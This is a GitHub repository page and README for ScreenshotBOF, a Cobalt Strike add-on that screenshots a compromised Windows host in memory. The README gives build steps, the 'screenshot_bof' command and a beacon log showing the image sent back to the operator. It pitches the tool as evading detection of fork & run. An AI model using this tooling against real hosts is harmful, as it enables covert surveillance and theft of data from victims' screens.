Go to file

CodeXTF2 053e265950 s		2022-11-01 20:26:23 +08:00
ScreenshotBOF	bmp renderer and user args	2022-11-01 20:25:10 +08:00
bin/BOF	bmp renderer and user args	2022-11-01 20:25:10 +08:00
.gitignore	first commit	2022-10-23 16:58:24 +08:00
README.md	s	2022-11-01 20:26:23 +08:00
ScreenshotBOF.sln	first commit	2022-10-23 16:58:24 +08:00

README.md

ScreenshotBOF

An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot downloaded in memory.

Self Compilation

git clone the repo
open the solution in Visual Studio
Build project BOF

Usage

import the screenshotBOF.cna script into Cobalt Strike
use the command screenshot_bof {local filename} {save method 0/1}

Save methods:

drop file to disk
download file over beacon (Cobalt Strike only)

beacon> screenshot_bof sad.bmp 1
[*] Running screenshot BOF by (@codex_tf2)
[+] host called home, sent: 5267 bytes
[+] received output:
[*] Screen saved to bitmap
[+] received output:
[*] Downloading bitmap over beacon with filename sad.bmp
[*] started download of sad.bmp

Notes

no evasion is performed, which should be fine since the WinAPIs used are not malicious

Why did I make this?

Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more OPSEC safe version of the screenshot capability.

Credits

Made using https://github.com/securifybv/Visual-Studio-BOF-template
Save BMP to file from https://stackoverflow.com/a/60667564
in memory download from https://github.com/anthemtotheego/CredBandit
@BinaryFaultline for BMP rendering in aggressorscript, and screenshot callback branch